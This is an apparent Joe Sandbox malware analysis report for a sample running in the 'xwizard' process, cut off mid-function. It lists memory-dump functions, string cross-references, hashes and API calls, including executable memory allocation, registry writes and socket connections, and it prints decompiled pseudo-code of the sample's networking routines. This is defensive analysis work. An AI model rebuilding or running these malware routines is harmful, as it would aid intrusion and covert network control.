g, xrefs: 00CC22FF
g, xrefs: 00CC2313
7, xrefs: 00CC23B9
M, xrefs: 00CC22E3
|, xrefs: 00CC2395
3, xrefs: 00CC2288
H, xrefs: 00CC238D
, xrefs: 00CC2401
, xrefs: 00CC2445
], xrefs: 00CC24AA
U, xrefs: 00CC2257
H, xrefs: 00CC2363
g, xrefs: 00CC2421
H, xrefs: 00CC22EF
(, xrefs: 00CC2323
g, xrefs: 00CC22D1
M, xrefs: 00CC231F
g, xrefs: 00CC235F
E, xrefs: 00CC2333

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 02042ffe0461cb58b15a965031e803335d76ce3326182043199e5f65b6eacf16
Instruction ID: 3447d4a0270540792db88262317d9e944e8c6eb6530c2088ad25700f62586f0d
Opcode Fuzzy Hash: 02042ffe0461cb58b15a965031e803335d76ce3326182043199e5f65b6eacf16
Instruction Fuzzy Hash: 4BC19C509087D9D9DB22C6BC88487CDBFB11F27228F4842C9E1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC253E, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 210
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,00CC13BD,?,00000000), ref: 00CC2809

Strings

@, xrefs: 00CC2736
], xrefs: 00CC27EF
8, xrefs: 00CC26B4
H, xrefs: 00CC26D2
H, xrefs: 00CC26A8
M, xrefs: 00CC2772
7, xrefs: 00CC26FE
$, xrefs: 00CC27C7
H, xrefs: 00CC2634
H, xrefs: 00CC277A
E, xrefs: 00CC2650
3, xrefs: 00CC25CD
t, xrefs: 00CC26F2
t, xrefs: 00CC26CA
}, xrefs: 00CC26B0
H, xrefs: 00CC273A
U, xrefs: 00CC263C
g, xrefs: 00CC2766
(, xrefs: 00CC2668
g, xrefs: 00CC2658
g, xrefs: 00CC2630
u, xrefs: 00CC2688
g, xrefs: 00CC2644
H, xrefs: 00CC2670
H, xrefs: 00CC26B9
_, xrefs: 00CC278E
, xrefs: 00CC278A
g, xrefs: 00CC274A
#, xrefs: 00CC27B2
g, xrefs: 00CC2616
|, xrefs: 00CC26DA
H, xrefs: 00CC26E6
d, xrefs: 00CC2782
U, xrefs: 00CC259C
L, xrefs: 00CC2648
H, xrefs: 00CC261D
H, xrefs: 00CC2690
$, xrefs: 00CC2601
g, xrefs: 00CC275A
H, xrefs: 00CC276A
D, xrefs: 00CC27A6
E, xrefs: 00CC2678
M, xrefs: 00CC2664
f, xrefs: 00CC27D3
W, xrefs: 00CC26A0
0, xrefs: 00CC267C
, xrefs: 00CC2746
M, xrefs: 00CC2628
g, xrefs: 00CC26A4
H, xrefs: 00CC2702
, xrefs: 00CC2654
0, xrefs: 00CC2776
j, xrefs: 00CC25C6
H, xrefs: 00CC2712
g, xrefs: 00CC266C
U, xrefs: 00CC2752
}, xrefs: 00CC2732
g, xrefs: 00CC272A
$, xrefs: 00CC27AA
L, xrefs: 00CC265C

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 6f3a2eea8abb305929a6d0908b71b44a0d431887636ad71e889b87b230bc57ed
Instruction ID: 02e8c82e9c696cdf0d6d489f66e924e8ba129862c2ee59b639584ca2ebfb1464
Opcode Fuzzy Hash: 6f3a2eea8abb305929a6d0908b71b44a0d431887636ad71e889b87b230bc57ed
Instruction Fuzzy Hash: 11C19C509087D9D9DB22C6BC88487CDBFB11F27228F4842CDE1E87B2D2C7B90549D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1EBC, Relevance: 91.7, APIs: 1, Strings: 60, Instructions: 208
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000089,00003000,00000040,?,?,?), ref: 00CC2181

Strings

g, xrefs: 00CC1FE4
g, xrefs: 00CC1FBC
$, xrefs: 00CC2122
H, xrefs: 00CC205E
, xrefs: 00CC20BE
H, xrefs: 00CC208A
, xrefs: 00CC2102
H, xrefs: 00CC2030
W, xrefs: 00CC2018
g, xrefs: 00CC20D2
8, xrefs: 00CC202C
0, xrefs: 00CC1FF4
_, xrefs: 00CC2106
g, xrefs: 00CC20DE
j, xrefs: 00CC1F3E
g, xrefs: 00CC1F8E
0, xrefs: 00CC20EE
@, xrefs: 00CC20AE
L, xrefs: 00CC1FC0
H, xrefs: 00CC1FAC
H, xrefs: 00CC2008
H, xrefs: 00CC20F2
H, xrefs: 00CC20E2
L, xrefs: 00CC1FD4
#, xrefs: 00CC212A
g, xrefs: 00CC1FA8
}, xrefs: 00CC20AA
E, xrefs: 00CC1FC8
E, xrefs: 00CC1FF0
H, xrefs: 00CC207A
g, xrefs: 00CC20C2
H, xrefs: 00CC20B2
g, xrefs: 00CC201C
$, xrefs: 00CC1F79
}, xrefs: 00CC2028
, xrefs: 00CC1FCC
H, xrefs: 00CC204A
D, xrefs: 00CC211E
U, xrefs: 00CC1FB4
M, xrefs: 00CC20EA
M, xrefs: 00CC1FDC
3, xrefs: 00CC1F45
], xrefs: 00CC2167
t, xrefs: 00CC206A
(, xrefs: 00CC1FE0
u, xrefs: 00CC2000
t, xrefs: 00CC203D
H, xrefs: 00CC1F95
H, xrefs: 00CC1FE8
g, xrefs: 00CC1FD0
7, xrefs: 00CC2076
U, xrefs: 00CC1F14
g, xrefs: 00CC20A2
d, xrefs: 00CC20FA
|, xrefs: 00CC2052
U, xrefs: 00CC20CA
$, xrefs: 00CC213F
f, xrefs: 00CC214B
H, xrefs: 00CC2020
M, xrefs: 00CC1FA0

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: $ $ $#$$$$$$$($0$0$3$7$8$@$D$E$E$H$H$H$H$H$H$H$H$H$H$H$H$H$L$L$M$M$M$U$U$U$W$]$_$d$f$g$g$g$g$g$g$g$g$g$g$j$t$t$u$|$}$}
API String ID: 4275171209-2925712947
Opcode ID: 4d53abd23ebdf4c1944fb11425371be08a052aa5783fbd8494affd5bfaa251c6
Instruction ID: cfde9dda9b6f5b757eb59aa9f78f91a1974501537a8854299b9b5b0af7d0903e
Opcode Fuzzy Hash: 4d53abd23ebdf4c1944fb11425371be08a052aa5783fbd8494affd5bfaa251c6
Instruction Fuzzy Hash: 4CC19C509087D9D9DB22C6BC88487CDBFB11F27228F4842CDE1E87B2D2C7B90559D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0430, Relevance: 36.1, APIs: 1, Strings: 23, Instructions: 105
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040), ref: 00CC054F

Strings

j, xrefs: 00CC044E
^, xrefs: 00CC04D5
W, xrefs: 00CC0489
$, xrefs: 00CC0479
H, xrefs: 00CC0491
H, xrefs: 00CC04A5
u, xrefs: 00CC0499
H, xrefs: 00CC04B9
f, xrefs: 00CC051A
M, xrefs: 00CC04C1
$, xrefs: 00CC04F1
#, xrefs: 00CC04F9
g, xrefs: 00CC048D
_, xrefs: 00CC04D1
], xrefs: 00CC0538
}, xrefs: 00CC04AD
3, xrefs: 00CC0452
D, xrefs: 00CC04ED
U, xrefs: 00CC0436
V, xrefs: 00CC0485
g, xrefs: 00CC04A1
g, xrefs: 00CC04B5
$, xrefs: 00CC050E

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: #$$$$$$$3$D$H$H$H$M$U$V$W$]$^$_$f$g$g$g$j$u$}
API String ID: 4275171209-407550641
Opcode ID: 446a2ac3f0bdeb76d4d21a5fba3ebfaa66e4da1ca3b65b8f0998a2a731f0a977
Instruction ID: 5729ea664f9e6f88de1309cbc9e2881a5d076ded8d4fabacf85d3b107e6db57f
Opcode Fuzzy Hash: 446a2ac3f0bdeb76d4d21a5fba3ebfaa66e4da1ca3b65b8f0998a2a731f0a977
Instruction Fuzzy Hash: C051AE1194D7C9D9DF22C6FC98487DEBF711F27224F480289E5E43B2D2C2A9050AD7BA

Uniqueness

Uniqueness Score: -1.00%

Function 00CC02F2, Relevance: 28.6, APIs: 1, Strings: 18, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000003E,00003000,00000040), ref: 00CC03FB

Strings

f, xrefs: 00CC03C8
H, xrefs: 00CC034A
e, xrefs: 00CC0346
$, xrefs: 00CC033A
H, xrefs: 00CC037B
}, xrefs: 00CC036F
g, xrefs: 00CC0377
g, xrefs: 00CC0367
$, xrefs: 00CC039F
#, xrefs: 00CC03A7
U, xrefs: 00CC02FB
%, xrefs: 00CC0356
D, xrefs: 00CC039B
`, xrefs: 00CC035A
], xrefs: 00CC03E4
$, xrefs: 00CC03BC
j, xrefs: 00CC0318
3, xrefs: 00CC031C

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: #$$$$$$$%$3$D$H$H$U$]$`$e$f$g$g$j$}
API String ID: 4275171209-212034420
Opcode ID: 78a40c36d6233135ad61ce59d6e5b2db63f2a8a0c6cf342b01b91a694debbb98
Instruction ID: cc50465eb899ad473cb04e20c2b810918974f5581ca0ac3fe07ff329ab8e1586
Opcode Fuzzy Hash: 78a40c36d6233135ad61ce59d6e5b2db63f2a8a0c6cf342b01b91a694debbb98
Instruction Fuzzy Hash: 1051AF11D4D7C9D9DB22C2FC98587DEAF711F37224F584289E5E03B2D2C6A50609D37A

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00405DAD
malloc.MSVCRT ref: 00405DF8
send.WS2_32 ref: 00405E96
WSAGetLastError.WS2_32 ref: 00405EA5
LeaveCriticalSection.KERNEL32 ref: 00405ECC

Strings

-, xrefs: 00405DB7

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeavemallocsend
String ID: -
API String ID: 1786834168-2547889144
Opcode ID: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
Instruction ID: 542a74277ee6daf56934a715b94c3cb6415021c893f49c4910618d7e1c795e3b
Opcode Fuzzy Hash: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
Instruction Fuzzy Hash: 8B416E70608B008FC720EF69D48461BBBE4EF85324F518A3FE994A73D1C77899458F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004059D3, Relevance: 9.2, APIs: 6, Instructions: 166
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
				char _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				void* __ebp;
				signed int _t57;
				intOrPtr _t61;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				char* _t93;
				char* _t94;
				char* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int* _t100;
				void* _t101;
				intOrPtr* _t102;

				_t88 = __ecx;
				_t100 =  &_v60;
				_t87 = _a4;
				_t97 = _a8;
				_v48 = 0xffffffff;
				if(E00408E53() != 4) {
					if(E00408E53() != 2) {
						_t93 =  &_v44;
						_v72 = _t97;
						 *_t100 = _t87;
						_v68 = _t93;
						_t57 = E004051B5(__ecx, _t90);
						if(_t57 != 0) {
							_v68 = 6;
							_v72 = 1;
							 *_t100 = 2; // executed
							L0041F8E4(); // executed
							_t101 = _t100 - 0xc;
							_v60 = _t57;
							if(_t57 == 0xffffffff) {
								goto L28;
							}
							_v80 = 0x10;
							_v84 = _t93;
							_v88 = _t57; // executed
							L0041F93C(); // executed
							_t102 = _t101 - 0xc;
							if(_t57 != 0) {
								L12:
								 *_t102 =  &_v72;
								_t57 = E00405999(_t90);
								goto L28;
							}
							L31:
							return _v72;
						}
						L28:
						return _t57 | 0xffffffff;
					}
					if( *0x42b300 == 0) {
						_t70 =  *0x42b304; // 0x0
						 *0x42b300 = _t70;
					}
					_t94 =  &_v44;
					_t98 =  &_v48;
					while(1) {
						_t61 =  *0x42b300; // 0x0
						if(_t61 == 0) {
							goto L31;
						}
						_v68 = _t94;
						_t91 =  *((intOrPtr*)(_t61 + 0x44));
						 *_t100 = _t61 + 4;
						_v72 =  *((intOrPtr*)(_t61 + 0x44));
						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
						if(_t63 == 0) {
							L26:
							_t64 =  *0x42b300; // 0x0
							 *0x42b300 =  *((intOrPtr*)(_t64 + 0x88));
							continue;
						}
						_v68 = 0;
						_v72 = 1;
						 *_t100 = 2;
						L0041F8E4();
						_v80 = 0x10;
						_v84 = _t94;
						_v88 = _t63;
						_v60 = _t63;
						L0041F93C();
						_t100 = _t100;
						if(_t63 == 0) {
							_t66 =  *0x42b300; // 0x0
							_v88 = _t97;
							_v92 = _t87;
							_v96 = _t66;
							 *_t100 = _v72;
							if(E004058E9(_t98) == 0) {
								goto L23;
							}
							goto L31;
						}
						L23:
						 *_t100 = _t98;
						E00405999(_t91);
						goto L26;
					}
					goto L31;
				}
				if( *0x42b300 == 0) {
					_t86 =  *0x42b304; // 0x0
					 *0x42b300 = _t86;
				}
				_t95 =  &_v44;
				_t99 =  &_v48;
				while(1) {
					_t71 =  *0x42b300; // 0x0
					if(_t71 == 0) {
						goto L31;
					}
					_v68 = _t95;
					_t92 =  *((intOrPtr*)(_t71 + 0x44));
					 *_t100 = _t71 + 4;
					_v72 =  *((intOrPtr*)(_t71 + 0x44));
					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
					if(_t73 == 0) {
						L15:
						_t74 =  *0x42b300; // 0x0
						 *0x42b300 =  *((intOrPtr*)(_t74 + 0x88));
						continue;
					}
					_v68 = 0;
					_v72 = 1;
					 *_t100 = 2;
					L0041F8E4();
					_v80 = 0x10;
					_v84 = _t95;
					_v88 = _t73;
					_v60 = _t73;
					L0041F93C();
					_t100 = _t100;
					if(_t73 != 0) {
						L14:
						 *_t100 = _t99;
						E00405999(_t92);
						goto L15;
					}
					_t92 =  *0x42b300; // 0x0
					_t77 =  *((intOrPtr*)(_t92 + 0x88));
					_t88 =  *((intOrPtr*)(_t77 + 0x44));
					_v96 = _t92;
					_v92 = _t77 + 4;
					_v88 =  *((intOrPtr*)(_t77 + 0x44));
					 *_t100 = _v72;
					if(E004058E9(_t99) == 0) {
						goto L14;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t81 =  *0x42b300; // 0x0
						 *0x42b300 =  *((intOrPtr*)(_t81 + 0x88));
						_t90 =  *0x42b300; // 0x0
						if(_t90 == 0) {
							goto L31;
						}
						_t83 =  *((intOrPtr*)(_t90 + 0x88));
						_t89 = _v72;
						if(_t83 == 0) {
							_v88 = _t97;
							_v92 = _t87;
						} else {
							_v92 = _t83 + 4;
							_v88 =  *(_t83 + 0x44);
						}
						_v96 = _t90;
						 *_t100 = _t89;
						if(E004058E9(_t99) != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L31;
				}
				goto L31;
			}

0x004059d3
0x004059d7
0x004059da
0x004059de
0x004059e2
0x004059f2
0x00405b38
0x00405c00
0x00405c04
0x00405c08
0x00405c0b
0x00405c0f
0x00405c16
0x00405c1d
0x00405c25
0x00405c2d
0x00405c34
0x00405c39
0x00405c3f
0x00405c43
0x00000000
0x00000000
0x00405c45
0x00405c4d
0x00405c51
0x00405c54
0x00405c59
0x00405c5e
0x00405af8
0x00405afc
0x00405aff
0x00000000
0x00405aff
0x00405c64
0x00000000
0x00405c64
0x00405c18
0x00000000
0x00405c18
0x00405b45
0x00405b47
0x00405b4c
0x00405b4c
0x00405b51
0x00405b55
0x00405b59
0x00405b59
0x00405b60
0x00000000
0x00000000
0x00405b66
0x00405b6a
0x00405b70
0x00405b73
0x00405b77
0x00405b7e
0x00405beb
0x00405beb
0x00405bf6
0x00000000
0x00405bf6
0x00405b80
0x00405b88
0x00405b90
0x00405b97
0x00405b9f
0x00405ba7
0x00405bab
0x00405bae
0x00405bb2
0x00405bb7
0x00405bbc
0x00405bc8
0x00405bcd
0x00405bd1
0x00405bd5
0x00405bdd
0x00405be7
0x00000000
0x00000000
0x00000000
0x00405be9
0x00405bbe
0x00405bbe
0x00405bc1
0x00000000
0x00405bc1
0x00000000
0x00405b59
0x004059ff
0x00405a01
0x00405a06
0x00405a06
0x00405a0b
0x00405a0f
0x00405a13
0x00405a13
0x00405a1a
0x00000000
0x00000000
0x00405a20
0x00405a24
0x00405a2a
0x00405a2d
0x00405a31
0x00405a38
0x00405b1b
0x00405b1b
0x00405b26
0x00000000
0x00405b26
0x00405a3e
0x00405a46
0x00405a4e
0x00405a55
0x00405a5d
0x00405a65
0x00405a69
0x00405a6c
0x00405a70
0x00405a75
0x00405a7a
0x00405b13
0x00405b13
0x00405b16
0x00000000
0x00405b16
0x00405a80
0x00405a86
0x00405a8c
0x00405a92
0x00405a96
0x00405a9e
0x00405aa2
0x00405aac
0x00000000
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405aae
0x00405aae
0x00405ab9
0x00405abe
0x00405ac6
0x00000000
0x00000000
0x00405acc
0x00405ad2
0x00405ad8
0x00405b09
0x00405b0d
0x00405ada
0x00405ae0
0x00405ae4
0x00405ae4
0x00405ae8
0x00405aec
0x00405af6
0x00000000
0x00000000
0x00000000
0x00000000
0x00405af6
0x00000000
0x00405aae
0x00000000

APIs

socket.WS2_32 ref: 00405A55
connect.WS2_32 ref: 00405A70

Part of subcall function 00405999: shutdown.WS2_32 ref: 004059B6
Part of subcall function 00405999: closesocket.WS2_32(00000000), ref: 004059C2

Part of subcall function 004051B5: gethostbyname.WS2_32 ref: 004051C5
Part of subcall function 004051B5: htons.WS2_32 ref: 00405202

socket.WS2_32 ref: 00405B97
connect.WS2_32 ref: 00405BB2
socket.WS2_32 ref: 00405C34
connect.WS2_32 ref: 00405C54

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: connectsocket$closesocketgethostbynamehtonsshutdown
String ID:
API String ID: 4225652895-0
Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A

Uniqueness

Uniqueness Score: -1.00%

Function 004106BD, Relevance: 9.1, APIs: 6, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00408ECF), ref: 004106EF
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410728
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00410765
RegQueryValueExA.ADVAPI32 ref: 004107A0
RegQueryValueExA.ADVAPI32 ref: 004107DD
RegCloseKey.ADVAPI32 ref: 004107F3

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: QueryValue$Open$Close
String ID:
API String ID: 2855150075-0
Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86

Uniqueness

Uniqueness Score: -1.00%

Function 00410608, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.ADVAPI32 ref: 00410656
RegSetValueExA.ADVAPI32 ref: 0041069B
RegCloseKey.ADVAPI32 ref: 004106AF

Strings

?, xrefs: 00410623

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: ?
API String ID: 1818849710-1684325040
Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86

Uniqueness

Uniqueness Score: -1.00%

Function 004132E6, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32 ref: 00413325
GetVersionExA.KERNEL32(?), ref: 00413379
GetSystemInfo.KERNEL32(?,?), ref: 0041338C

Part of subcall function 0041328F: NetWkstaGetInfo.NETAPI32 ref: 004132B1
Part of subcall function 0041328F: NetApiBufferFree.NETAPI32 ref: 004132D8

GetSystemMetrics.USER32 ref: 004133FA

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: InfoSystemVersion$BufferFreeMetricsWksta
String ID:
API String ID: 1266462847-0
Opcode ID: a2f5e60309e9ea63997a5f63661c2a67e865f2bf7c7b30ca2f3ef5845b7a97e1
Instruction ID: aea862b3450ebf307a16053a8a3fc20b1df094ade6bc7c343729d6a33193dea1
Opcode Fuzzy Hash: a2f5e60309e9ea63997a5f63661c2a67e865f2bf7c7b30ca2f3ef5845b7a97e1
Instruction Fuzzy Hash: D7418E7040C7419AEB21AF21C5457AFBAE0AF81759F148E2FE4C487281D37D8AC98B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1706, Relevance: 6.1, APIs: 4, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,?,?,00CC131C), ref: 00CC172B
CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,00000000,?,00CC131C), ref: 00CC174D

Memory Dump Source

Source File: 0000000E.00000002.863948201.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_cc0000_xwizard.jbxd

Similarity

API ID: CreateFile$Mapping
String ID:
API String ID: 2428082958-0
Opcode ID: 11a8cb569d0941fe68267423b06c431235959936bbd495daaa5b2d21cf56c0e2
Instruction ID: e936c2d65caa39a661b8b4b6f9c3b20039c5fae24bbd867b445324efecc85848
Opcode Fuzzy Hash: 11a8cb569d0941fe68267423b06c431235959936bbd495daaa5b2d21cf56c0e2
Instruction Fuzzy Hash: 9E018050740619BEEA9272BA8CC2F7F609D8FD6795F28016CFD26F2182DE644E012371

Uniqueness

Uniqueness Score: -1.00%

Function 00405214, Relevance: 6.1, APIs: 4, Instructions: 59
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405214(char _a4, signed int _a8) {
				char _v24;
				char _v25;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char* _t35;
				char* _t36;
				char _t37;
				char* _t38;
				signed int _t39;

				_t41 =  &_v64;
				_t39 = _a8;
				_t37 = _a4;
				if((_t39 & 0x00000001) != 0) {
					_t35 =  &_v24;
					_v72 = 0x8004667e;
					_v76 = _t37;
					_v24 = 1;
					_v68 = _t35;
					L0041F91C(); // executed
					_t41 =  &_v64 - 0xc;
				}
				if((_t39 & 0x00000002) != 0) {
					_t38 =  &_v25;
					_v60 = 1;
					_v68 = 8;
					_v72 = 0xffff;
					_v76 = _t37;
					_v64 = _t38;
					_v25 = 1;
					L0041F8F4(); // executed
					_t41 = _t41 - 0x14;
					if(_t35 == 0) {
						_t35 =  &_v44;
						_v64 = 0;
						_v68 = 0;
						_v72 = _t38;
						_v76 = 0;
						_v80 = 0;
						_v84 = 0xc;
